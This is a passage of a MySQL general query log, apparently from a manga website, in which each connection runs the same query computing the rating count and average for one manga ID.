u317079482_mangacherri_2 using Socket 330660900 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330660900 Quit 330660901 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660901 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330660901 Quit 330660902 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660902 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330660902 Quit 330660903 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660903 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330660903 Quit 330660904 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660904 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330660904 Quit 330660905 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660905 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330660905 Quit 330660906 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660906 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330660906 Quit 330660907 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660907 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330660907 Quit 330660908 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660908 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330660908 Quit 330660909 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660909 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330660909 Quit 330660910 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660910 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330660910 Quit 330660911 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660911 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330660911 Quit 330660912 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660912 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330660912 Quit 330660913 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660913 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330660913 Quit 330660914 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660914 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330660914 Quit 330660915 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660915 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330660915 Quit 330660916 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660916 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330660916 Quit 330660917 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660917 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330660917 Quit 330660918 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660918 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330660918 Quit 330660919 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660919 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330660919 Quit 330660920 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660920 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330660920 Quit 330660921 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660921 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330660921 Quit 330660922 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660922 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330660922 Quit 330660923 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660923 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330660923 Quit 330660924 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660924 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330660924 Quit 330660925 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660925 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330660925 Quit 330660926 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660926 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330660926 Quit 330660927 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660927 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330660927 Quit 330660928 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660928 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330660928 Quit 330660929 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660929 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330660929 Quit 330660930 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660930 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330660930 Quit 330660931 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660931 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330660931 Quit 330660932 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660932 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330660932 Quit 330660933 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660933 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330660933 Quit 330660934 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660934 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330660934 Quit 330660935 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660935 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330660935 Quit 330660936 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660936 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330660936 Quit 330660937 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660937 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330660937 Quit 330660938 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660938 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330660938 Quit 330660939 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660939 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330660939 Quit 330660940 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660940 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330660940 Quit 330660941 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660941 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330660941 Quit 330660942 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660942 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330660942 Quit 330660943 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660943 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330660943 Quit 330660944 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660944 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330660944 Quit 330660945 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660945 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330660945 Quit 330660946 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660946 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330660946 Quit 330660947 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660947 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330660947 Quit 330660948 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660948 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330660948 Quit 330660949 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660949 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330660949 Quit 330660950 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660950 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330660950 Quit 330660951 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660951 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330660951 Quit 330660952 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660952 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330660952 Quit 330660953 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660953 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330660953 Quit 330660954 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660954 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330660954 Quit 330660955 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660955 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330660955 Quit 330660956 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660956 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330660956 Quit 330660957 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660957 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330660957 Quit 330660958 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660958 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330660958 Quit 330660959 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660959 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330660959 Quit 330660960 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660960 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330660960 Quit 330660961 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660961 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330660961 Quit 330660962 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660962 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330660962 Quit 330660963 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660963 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330660963 Quit 330660964 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660964 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330660964 Quit 330660965 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660965 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330660965 Quit 330660966 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660966 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330660966 Quit 330660967 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660967 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330660967 Quit 330660968 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660968 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330660968 Quit 330660969 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660969 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330660969 Quit 330660970 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660970 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330660970 Quit 330660971 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660971 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330660971 Quit 330660972 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660972 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330660972 Quit 330660973 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660973 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330660973 Quit 330660974 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660974 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330660974 Quit 330660975 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660975 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330660975 Quit 330660976 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660976 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330660976 Quit 330660977 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660977 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330660977 Quit 330660978 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660978 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330660978 Quit 330660979 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660979 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330660979 Quit 330660980 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660980 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330660980 Quit 330660981 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660981 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330660981 Quit 330660982 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660982 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330660982 Quit 330660983 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660983 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330660983 Quit 330660984 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660984 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330660984 Quit 330660985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660985 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330660985 Quit 330660986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660986 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330660986 Quit 330660987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660987 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330660987 Quit 330660988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660988 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330660988 Quit 330660989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660989 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330660989 Quit 330660990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660990 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330660990 Quit 330660991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660991 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330660991 Quit 330660992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660992 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330660992 Quit 330660993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660993 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330660993 Quit 330660994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660994 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330660994 Quit 330660995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660995 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330660995 Quit 330660996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660996 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330660996 Quit 330660997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660997 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330660997 Quit 330660998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660998 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330660998 Quit 330660999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330660999 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330660999 Quit 330661000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661000 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330661000 Quit 330661001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661001 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330661001 Quit 330661002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661002 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330661002 Quit 330661003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661003 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330661003 Quit 330661004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661004 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330661004 Quit 330661005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661005 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330661005 Quit 330661006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661006 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330661006 Quit 330661007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661007 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330661007 Quit 330661008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661008 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330661008 Quit 330661009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661009 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330661009 Quit 330661010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661010 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330661010 Quit 330661011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661011 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330661011 Quit 330661012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661012 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330661012 Quit 330661013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661013 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330661013 Quit 330661014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661014 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330661014 Quit 330661015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661015 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330661015 Quit 330661016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661016 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330661016 Quit 330661017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661017 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330661017 Quit 330661018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661018 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330661018 Quit 330661019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661019 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330661019 Quit 330661020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661020 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330661020 Quit 330661021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661021 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330661021 Quit 330661022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661022 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330661022 Quit 330661023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661023 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330661023 Quit 330661024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661024 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330661024 Quit 330661025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661025 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330661025 Quit 330661026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661026 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330661026 Quit 330661027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661027 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330661027 Quit 330661028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661028 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330661028 Quit 330661029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661029 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330661029 Quit 330661030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661030 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330661030 Quit 330661031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661031 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330661031 Quit 330661032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661032 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330661032 Quit 330661033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661033 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330661033 Quit 330661034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661034 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330661034 Quit 330661035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661035 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330661035 Quit 330661036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661036 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330661036 Quit 330661037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661037 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330661037 Quit 330661038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661038 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330661038 Quit 330661039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661039 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330661039 Quit 330661040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661040 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330661040 Quit 330661041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661041 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330661041 Quit 330661042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661042 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330661042 Quit 330661043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661043 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330661043 Quit 330661044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661044 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330661044 Quit 330661045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661045 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330661045 Quit 330661046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661046 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330661046 Quit 330661047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661047 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330661047 Quit 330661048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661048 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330661048 Quit 330661049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661049 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330661049 Quit 330661050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661050 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330661050 Quit 330661051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661051 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330661051 Quit 330661052 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661052 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330661052 Quit 330661053 Connect mangauser@localhost on 